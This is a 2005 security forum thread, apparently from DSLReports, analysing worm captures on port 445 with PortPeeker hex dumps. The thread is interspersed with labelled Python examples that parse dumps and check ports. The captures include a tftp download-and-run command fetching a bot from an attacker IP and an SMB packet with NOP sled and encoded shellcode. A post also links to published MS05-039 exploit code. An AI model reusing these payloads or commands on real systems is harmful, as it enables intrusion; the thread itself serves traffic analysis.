1111111111111111 2E0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2F0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 300 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 310 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 320 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 330 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 340 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 350 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 360 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 370 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 380 31 31 31 31 31 31 31 31 31 
31 31 31 31 31 31 31 1111111111111111 390 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3A0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3B0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3C0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3E0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3F0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 400 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 410 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 420 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 430 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 440 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 450 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 460 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 470 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 480 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 490 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4A0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4B0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4C0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4E0 31 31 31 31 31 31 31 31 11111111 Blake |
to jvmorris
said by jvmorris:
Probably a capture that Blake made using PortPeeker. You can find it via the website at www.linklogger.com, if that's what it is.
Thank you JVMorris.... I tend to be a curious one and have actually gotten compulsive with learning all I can about Security.... I've downloaded that program and will check it out this weekend.... Rgds, Sherri
jvmorris (I Am The Man Who Was Not There.) MVM join:2001-04-03 Reston, VA
Anytime, somewhere or other, Blake posted something on how you can use those MD5 hashes to determine if you're seeing the 'same old, same old' or something new. Unfortunately, I've forgotten where that was.
Now, that's just the MD5 hash of the captured packet; it's not a disassembly of the captured code. (I think Steve can tell you more about that, if you're interested in playing with assembler.)
A Sasser type approach (note the tftp transfer): 81.240.111.123 : 4565 TCP Data In Length 1452 bytes MD5 = 8442B1FBB561B60CC9E9E254B7C25B6F ---- 13/08/2005 14:12:28.837
500 FF FF 63 6D 64 20 2F 63 20 74 66 74 70 20 2D 69 ..cmd /c tftp -i
510 20 38 31 2E 32 34 30 2E 31 31 31 2E 31 32 33 20 81.240.111.123
520 47 45 54 20 4D 53 4C 53 41 33 32 2E 65 78 65 26 GET MSLSA32.exe&
530 73 74 61 72 74 20 4D 53 4C 53 41 33 32 2E 65 78 start MSLSA32.ex
540 65 26 65 78 69 74 00 42 42 42 42 42 42 42 42 42 e&exit.BBBBBBBBB
Edit -> this is the Backdoor.Win32.Rbot.gen worm
Blake
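The MD5 "same old, same old or something new" check jvmorris mentions, together with pulling the readable command strings (like the tftp line above) out of a PortPeeker dump, as an added Python example that is not part of this thread and not PortPeeker's own code. The captures it parses are constructed (documentation addresses, standard MD5 test strings), laid out the way PortPeeker prints them.

```python
"""Parse PortPeeker-style capture text ("IP : port TCP Data In Length N bytes
MD5 = ... ---- date time" followed by "offset hex-bytes ascii" rows), check the
recorded MD5 against the dumped bytes, pull out printable strings, and triage
captures against hashes already seen.  Added example, not PortPeeker's code;
the sample captures at the bottom are constructed."""
import hashlib
import re
from dataclasses import dataclass

HEADER_RE = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) : (?P<port>\d+) TCP Data In Length "
    r"(?P<length>\d+) bytes MD5 = (?P<md5>[0-9A-Fa-f]{32}) ---- "
    r"(?P<stamp>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}\.\d+)")


@dataclass
class Capture:
    ip: str
    port: int
    length: int
    md5: str        # hash recorded in the capture header, lower-case hex
    stamp: str
    payload: bytes  # bytes rebuilt from the hex columns


def _parse_rows(text, pos, length):
    """Rebuild `length` bytes from dump rows starting at text[pos].

    Rows are matched by position, not by splitting on whitespace: the ASCII
    column can contain spaces ("cmd /c tftp -i") and, on a short last row,
    can look like a hex pair.  That column is always exactly as wide as the
    row's byte count, so it is skipped by width."""
    payload = bytearray()
    while len(payload) < length:
        n = min(16, length - len(payload))
        row = re.compile(r"\s*([0-9A-Fa-f]+)((?:\s[0-9A-Fa-f]{2}){%d})\s" % n
                         ).match(text, pos)
        if row is None:
            raise ValueError("dump truncated at offset %#x" % len(payload))
        if int(row.group(1), 16) != len(payload):
            raise ValueError("row offset %s is out of sequence" % row.group(1))
        payload += bytes.fromhex(row.group(2))  # fromhex tolerates the spaces
        pos = row.end() + n                     # step over the ASCII column
    return bytes(payload), pos


def parse_captures(text):
    """Parse every capture found in a block of PortPeeker output, in order."""
    caps = []
    for h in HEADER_RE.finditer(text):
        payload, _ = _parse_rows(text, h.end(), int(h["length"]))
        caps.append(Capture(h["ip"], int(h["port"]), int(h["length"]),
                            h["md5"].lower(), h["stamp"], payload))
    return caps


def md5_matches(cap):
    """True when the header's MD5 really is the hash of the dumped bytes."""
    return hashlib.md5(cap.payload).hexdigest() == cap.md5


def printable_strings(payload, min_len=4):
    """Printable runs: plain ASCII, and UTF-16LE (the "h.t.t.p" look of a
    wide string in a dump, each character followed by a NUL byte)."""
    ascii_run = rb"[\x20-\x7e]{%d,}" % min_len
    wide_run = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    found = [m.group().decode("ascii") for m in re.finditer(ascii_run, payload)]
    found += [m.group().decode("utf-16-le") for m in re.finditer(wide_run, payload)]
    return found


def triage(captures, seen_md5s):
    """Label each capture 'known' (hash seen before), 'new' (first sighting,
    recorded in seen_md5s) or 'mismatch' (header hash disagrees with the
    bytes, so the dump was mangled somewhere and should not be trusted)."""
    labels = []
    for cap in captures:
        if not md5_matches(cap):
            status = "mismatch"
        elif cap.md5 in seen_md5s:
            status = "known"
        else:
            status = "new"
            seen_md5s.add(cap.md5)
        labels.append((cap.ip, cap.md5, status))
    return labels


# Constructed sample in PortPeeker's flattened layout: 198.51.100.x and
# 203.0.113.x are documentation addresses; the payloads are the standard
# MD5 test vectors, so the recorded hashes can be checked by hand.
SAMPLE = (
    "198.51.100.7 : 4565 TCP Data In Length 43 bytes "
    "MD5 = 9E107D9D372BB6826BD81D3542A419D6 ---- 13/08/2005 14:12:28.837 "
    "0 54 68 65 20 71 75 69 63 6B 20 62 72 6F 77 6E 20 The quick brown "
    "10 66 6F 78 20 6A 75 6D 70 73 20 6F 76 65 72 20 74 fox jumps over t "
    "20 68 65 20 6C 61 7A 79 20 64 6F 67 he lazy dog "
    "203.0.113.9 : 1026 TCP Data In Length 3 bytes "
    "MD5 = 900150983CD24FB0D6963F7D28E17F72 ---- 13/08/2005 14:12:29.001 "
    "0 61 62 63 abc"
)

if __name__ == "__main__":
    caps = parse_captures(SAMPLE)
    for cap, (_, _, status) in zip(caps, triage(caps, set())):
        print(cap.ip, cap.stamp, cap.md5, status, printable_strings(cap.payload))
```

Feed it a saved PortPeeker log and a file of hashes you have already looked at, and only the "new" and "mismatch" lines need a second look.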
to Link Logger
I don't mean to steal the thread, but I thought I would look at this myself. I went to fire up PortPeeker and I got this access denied after configuring the scanner. |
catseyenuAck Pfft Premium Member join:2001-11-17 Fix East
He is right, you need to be an admin-level user to get access to the raw ports, or something is already listening on that port, as only one application can listen on a port at a time. Blake |
norwegian Premium Member join:2005-02-15 Outback |
to Link Logger
G'day all. To Link Logger: I tried PortPeeker last night and had 445 give me the same error, even though I tried 443 and had no dramas in that program. Can't remember, but port 1700 showed a raw port (socket), besides those 2 x 445 I have, yet Port Explorer never showed anything. I will see if I can get something off that port; it used to be 1900, till I met the good people here. norwegian |
Windows by default typically takes TCP ports 135, 137, 139, 445, etc., so before listening on a port with PortPeeker you might want to check to see if that port is already open by doing something like netstat -a.
I have some special Windows installs that I use to listen on ports 445, 135 and other typical Windows ports. Try PortPeeker on TCP port 80 and you will see some Nimda attacks or UDP port 1434 and you will likely see some SQL Slammer attacks.
Blake |
Well, I am the admin, but Windows is listening at 0.0.0.0, not sure why though. Also I have tracked traffic on port 445 before on this same computer. Ahh well, it works on all the other ports LOL. |
Marilla9 (I Am My Own Arbiter) Premium Member join:2002-12-06 Belpre, OH 2005-Aug-13 11:16 pm |
When netstat says your system is listening on 0.0.0.0, that means it's listening on all available IP addresses which likely, in your case, is the only one you have.
Also incidentally, anything that says it's listening on 127.0.0.1 means it will only respond to itself.
Some things will show as your 'real' IP. Since you likely only have one, that's effectively the same as 0.0.0.0. A system can have multiple IPs, though... and any netstat entries which show 0.0.0.0 mean it's listening on any/all IPs on that interface. |
I think 0.0.0.0 means all interfaces, including any loopbacks (e.g. 127.0.0.1). I think that's what you were saying as well, but it wasn't clear (to me) that you also meant the loopback(s). EDIT: dannyboy, you will most likely not be able to use PortPeeker on port 445 if you're using a Windows (2k/XP) machine. As Link Logger already said, the system binds to these ports way before you get a chance to login and grab them. You can disable NetBIOS to free up things like 139, but things like 135 and 445 are more of a challenge if you want to maintain a working machine that can map drives/printers/etc. Link Logger mentioned he is using 'special' machines for these captures, meaning he has all of this stuff (NetBIOS, CIFS, RPC, etc) turned off. Unless you have a hardened system I would not be allowing 445 traffic through to your PC anyway. Just my $0.02. |
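The two points made above, that only one listener can own a port and that 0.0.0.0 covers every address including 127.0.0.1, shown with the socket API. This is an added example, not code from the thread or from PortPeeker; it assumes Python 3, and the Winsock error numbers are handled where Python exposes them so the same diagnosis works on Windows.

```python
"""Check whether a TCP port can be taken before starting a listener.

Added example, not code from the thread or from PortPeeker. A port can be
held by exactly one listener, and 0.0.0.0 (all interfaces) overlaps
127.0.0.1 (loopback only), so a listener on either blocks the other.
"""
import errno
import socket

# Python reports Winsock failures with the WSAE* numbers on Windows
IN_USE = {errno.EADDRINUSE, getattr(errno, "WSAEADDRINUSE", errno.EADDRINUSE)}
DENIED = {errno.EACCES, errno.EPERM, getattr(errno, "WSAEACCES", errno.EACCES)}


def bind_result(host, port):
    """Try to bind and listen on host:port and report why it failed, if it did.

    Returns "free" (the port was available; the probe socket is closed
    again), "in_use" (another socket owns it), "no_privilege" (the OS
    refused, e.g. a non-admin user on a reserved port) or "other:<errno>".
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind((host, port))
        s.listen(1)
        return "free"
    except OSError as e:
        if e.errno in IN_USE:
            return "in_use"
        if e.errno in DENIED:
            return "no_privilege"
        return f"other:{e.errno}"
    finally:
        s.close()


def demo_wildcard_conflict():
    """Hold a loopback-only listener and probe the same port both ways.

    The OS picks a free port (port 0) for the holder; binding 0.0.0.0 on
    that port then fails as in_use even though nothing listens on the
    wildcard address, because 0.0.0.0 covers 127.0.0.1 as well.
    """
    holder = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    holder.bind(("127.0.0.1", 0))
    holder.listen(1)
    port = holder.getsockname()[1]
    try:
        return {
            "port": port,
            "wildcard": bind_result("0.0.0.0", port),
            "loopback": bind_result("127.0.0.1", port),
            "other_port": bind_result("127.0.0.1", 0),  # an OS-chosen free port
        }
    finally:
        holder.close()


if __name__ == "__main__":
    print(demo_wildcard_conflict())
    # On a stock Windows box the SMB service already owns 445, so this
    # reports in_use or no_privilege: the "access denied" seen in the thread.
    print("445:", bind_result("0.0.0.0", 445))
```

Running bind_result("0.0.0.0", 445) is the programmatic form of the netstat -a check suggested earlier: if it does not come back "free", a listener tool will not get the port either, whatever account it runs under.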
Name Game Premium Member join:2002-07-07 Grand Rapids, MI 1 edit |
to Link Logger
Looks like Zotob » MS05-039 PnP worm in the wild. So nice of someone to publish the exploit code.. » www.frsirt.com/exploits/ ··· pl.c.php |
Daniel MVM join:2000-06-26 San Francisco, CA 2005-Aug-14 3:23 pm
said by Name Game: So nice of someone to publish the exploit code... And for you to post a link to it. |
ZZZZZZZ Premium Member join:2001-05-27 PARADISE |
to Link Logger
And so what happens if you close those ports with something like this? » www.firewallleaktester.c ··· wwdc.htm |
Name Game Premium Member join:2002-07-07 Grand Rapids, MI |
to Daniel
said by Daniel: said by Name Game: So nice of someone to publish the exploit code... And for you to post a link to it. Oh, is that what that was.. :D |
redxii Mod join:2001-02-26 Michigan 2005-Aug-14 6:26 pm
Apparently that code isn't sufficient to exploit it. I compiled and ran it against Windows 2000 on my LAN without the patch and nothing happened, except receiving the packet. |
Sorry, really busy weekend with family stuff. As one worm was designed to work, I went to handydjs.com and was able to download the bot.exe file, which is Backdoor.Win32.Wootbot.bw.
I don't think any of these are the new worm, but given this new worm attacks 445, I don't think it's really possible to score big as a worm/virus writer on TCP port 445/139/135, as every vulnerable 445/139/135 system has already been owned at least x times, so in short it's the same old victim, just with a new master for now.
Has anyone seen a significant jump in their 445 traffic?
Blake |
Link Logger |
And another:

68.144.64.230 : 3421 TCP Data In Length 1460 bytes MD5 = C352C88FB9D3BFA1057DF0FBDE4E5BD1 ---- 15/08/2005 01:51:54.168
0 00 00 08 90 FF 53 4D 42 25 00 00 00 00 18 07 C8 .....SMB%.......
10 00 00 00 00 00 00 00 00 00 00 00 00 00 08 78 04 ..............x.
20 00 08 60 00 10 00 00 3C 08 00 00 00 01 00 00 00 ..`....<........
30 00 00 00 00 00 00 00 00 00 54 00 3C 08 54 00 02 .........T.<.T..
40 00 26 00 00 40 4D 08 00 5C 00 50 00 49 00 50 00 .&..@M..\.P.I.P.
50 45 00 5C 00 00 00 40 00 05 00 00 03 10 00 00 00 E.\...@.........
60 3C 08 00 00 01 00 00 00 24 08 00 00 00 00 36 00 <.......$.....6.
70 11 00 00 00 00 00 00 00 11 00 00 00 52 00 4F 00 ............R.O.
80 4F 00 54 00 5C 00 53 00 59 00 53 00 54 00 45 00 O.T.\.S.Y.S.T.E.
90 4D 00 5C 00 30 00 30 00 30 00 30 00 00 00 00 00 M.\.0.0.0.0.....
A0 FF FF 00 00 E0 07 00 00 00 00 00 00 00 00 00 00 ................
B0 C0 07 00 00 00 00 00 00 90 90 90 90 90 90 90 90 ................
C0 EB 08 90 90 67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv
D0 EB 08 90 90 67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv
E0 EB 08 90 90 67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv
F0 EB 08 90 90 67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv
100 EB 08 90 90 67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv
110 90 90 90 90 90 90 90 EB 08 90 90 48 4F 44 88 90 ...........HOD..
120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
130 29 C9 83 E9 B0 D9 EE D9 74 24 F4 5B 81 73 13 19 ).......t$.[.s..
140 F5 04 37 83 EB FC E2 F4 E5 9F EF 7A F1 0C FB C8 ..7........z....
150 E6 95 8F 5B 3D D1 8F 72 25 7E 78 32 61 F4 EB BC ...[=..r%~x2a...
160 56 ED 8F 68 39 F4 EF 7E 92 C1 8F 36 F7 C4 C4 AE V..h9..~...6....
170 B5 71 C4 43 1E 34 CE 3A 18 37 EF C3 22 A1 20 1F .q.C.4.:.7..". .
180 6C 10 8F 68 3D F4 EF 51 92 F9 4F BC 46 E9 05 DC l..h=..Q..O.F...
190 1A D9 8F BE 75 D1 18 56 DA C4 DF 53 92 B6 34 BC ....u..V...S..4.
1A0 59 F9 8F 47 05 58 8F 77 11 AB 6C B9 57 FB E8 67 Y..G.X.w..l.W..g
1B0 E6 23 62 64 7F 9D 37 05 71 82 77 05 46 A1 FB E7 .#bd.7.q.w.F...
1C0 71 3E E9 CB 22 A5 FB E1 46 7C E1 51 98 18 0C 35 q>.."...F|.Q...5
1D0 4C 9F 06 C8 C9 9D DD 3E EC 58 53 C8 CF A6 57 64 L......>.XS...Wd
1E0 4A A6 47 64 5A A6 FB E7 7F 9D 14 8B 7F A6 8D D6 J.GdZ.........
1F0 8C 9D A0 2D 69 32 53 C8 CF 9F 14 66 4C 0A D4 5F ...-i2S....fL.._
200 BD 58 2A DE 4E 0A D2 64 4C 0A D4 5F FC BC 82 7E .X*.N..dL.._...~
210 4E 0A D2 67 4D A1 51 C8 C9 66 6C D0 60 33 7D 60 N..gM.Q..fl.`3}`
220 E6 23 51 C8 C9 93 6E 53 7F 9D 67 5A 90 10 6E 67 .#Q...nS.gZ..ng
230 40 DC C8 BE FE 9F 40 BE FB C4 C4 C4 B3 0B 46 1A @.....@.......F.
240 E7 B7 28 A4 94 8F 3C 9C B2 5E 6C 45 E7 46 12 C8 ..(...<..^lE.F..
250 6C B1 FB E1 42 A2 56 66 48 A4 6E 36 48 A4 51 66 l...B.VfH.n6H.Qf
260 E6 25 6C 9A C0 F0 CA 64 E6 23 6E C8 E6 C2 FB E7 .%l....d.#n.....
270 92 A2 F8 B4 DD 91 FB E1 4B 0A D4 5F F6 3B E4 57 ........K.._.;.W
280 4A 0A D2 C8 C9 F5 04 37 90 90 90 90 90 90 90 90 J......7........
290 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
300 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
310 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
330 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
340 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
350 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
360 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
370 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
380 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
390 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
3F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
450 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
460 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
470 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
480 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
490 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
4A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
4B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
4C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
4D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
4E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
4F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
500 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
510 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
520 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
530 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
540 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
550 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
560 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
570 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
580 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
590 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
5A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
5B0 90 90 90 90 ....

68.144.64.230 : 3421 TCP Data In Length 736 bytes MD5 = E691C88EB51C6E64D51854BF50140314 ---- 15/08/2005 01:51:54.228
0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
20 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
30 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
40 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
50 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
60 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
70 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
80 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
150 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
160 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
170 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
180 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
1A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
1B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
1C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
1D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
1E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
1F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
200 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
210 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
220 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
230 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
240 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
250 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
260 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
270 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
280 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
290 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
2D0 90 90 90 90 E0 07 00 00 04 00 00 00 00 00 00 00 ................

Blake |
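A small triage helper for captures in the layout posted above (hex offset, up to 16 hex bytes, ASCII column): it rebuilds the bytes, recomputes the MD5 so it can be compared with the logged one, reads the SMB command byte, pulls out printable strings (the download command in the first capture) and measures the longest single-byte run (the 0x41 filler and 0x90 sleds). This is an added example, not code from the thread or from PortPeeker; SAMPLE_DUMP is constructed for it with a TEST-NET address and a placeholder file name, and is not one of the captures from the thread.

```python
"""Rebuild a PortPeeker-style hex dump into bytes and triage the payload.

Added example, not code from the thread or from PortPeeker. SAMPLE_DUMP is
constructed for this example (TEST-NET address, placeholder file name).
"""
import hashlib
import re

SAMPLE_DUMP = """\
0 00 00 00 3C FF 53 4D 42 73 00 00 00 00 18 07 C8 ...<.SMBs.......
10 63 6D 64 20 2F 63 20 74 66 74 70 20 2D 69 20 31 cmd /c tftp -i 1
20 39 32 2E 30 2E 32 2E 31 20 47 45 54 20 78 2E 65 92.0.2.1 GET x.e
30 78 65 26 78 2E 65 78 65 00 90 90 90 90 90 90 90 xe&x.exe........
"""

ROW_HEAD = re.compile(r"^\s*([0-9A-Fa-f]+)\s+(.*?)\s*$")
HEX_PAIR = re.compile(r"[0-9A-Fa-f]{2}(?:\s+|$)")

# SMB1 command codes seen in the captures above (MS-CIFS 2.2.2.1)
SMB_COMMANDS = {
    0x25: "SMB_COM_TRANSACTION",
    0x72: "SMB_COM_NEGOTIATE",
    0x73: "SMB_COM_SESSION_SETUP_ANDX",
    0x75: "SMB_COM_TREE_CONNECT_ANDX",
}


def parse_row(line):
    """Return (offset, bytes) for one dump row, or None if it is not a row."""
    m = ROW_HEAD.match(line)
    if not m:
        return None
    offset, rest = int(m.group(1), 16), m.group(2)
    starts, pos = [], 0            # index in `rest` where each hex pair begins
    while len(starts) < 16:
        mm = HEX_PAIR.match(rest, pos)
        if not mm:
            break
        starts.append(pos)
        pos = mm.end()
    # A short last row is ambiguous when its ASCII column looks like hex
    # ("42 42 BB"): the column has one character per byte, so hand pairs
    # back until the lengths agree.
    while len(starts) < 16 and starts and len(rest[pos:]) < len(starts):
        pos = starts.pop()
    if not starts:
        return None
    return offset, bytes.fromhex("".join(rest[s:s + 2] for s in starts))


def parse_dump(text):
    """Parse all rows of a dump, checking that the offsets are contiguous."""
    out = bytearray()
    for line in text.splitlines():
        row = parse_row(line)
        if row is None:
            continue
        offset, data = row
        if offset != len(out):
            raise ValueError(f"row at {offset:#x} does not follow {len(out):#x}")
        out += data
    return bytes(out)


def printable_strings(data, min_len=5):
    """Runs of printable ASCII (0x20-0x7E) at least min_len bytes long."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def longest_run(data):
    """(length, byte value) of the longest run of one repeated byte."""
    best_len = best_byte = 0
    cur_byte, cur_len = None, 0
    for b in data:
        cur_byte, cur_len = (b, cur_len + 1) if b == cur_byte else (b, 1)
        if cur_len > best_len:
            best_len, best_byte = cur_len, b
    return best_len, best_byte


def smb_summary(data):
    """Decode the NetBIOS session header and SMB1 command byte, if present."""
    if len(data) < 9 or data[4:8] != b"\xffSMB":
        return None
    return {
        "netbios_length": int.from_bytes(data[1:4], "big"),
        "command": data[8],
        "name": SMB_COMMANDS.get(data[8], "unknown"),
    }


def triage(dump_text):
    """What a first look at one captured payload should report."""
    data = parse_dump(dump_text)
    return {
        "length": len(data),
        "md5": hashlib.md5(data).hexdigest(),   # compare with the logged MD5
        "smb": smb_summary(data),
        "strings": printable_strings(data),
        "longest_run": longest_run(data),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_DUMP).items():
        print(f"{key}: {value}")
```

Applied to the captures above, the command byte separates the two attack types at a glance (0x73 Session Setup AndX in the first capture, 0x25 Transaction against the \PIPE\ named pipe in the second), and the strings and run length tell you whether a payload carries a plain download command or only a sled.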
Mark75 Premium Member join:2001-11-15 Phoenix, AZ 3 edits |
to Link Logger
03:04:11 Drop TCP packet from WAN 71.114.32.235:3377 71.114.86.x:445 Rule: Bad deny
03:03:32 Drop TCP packet from WAN 68.206.76.231:3952 71.114.86.x:445 Rule: Bad deny
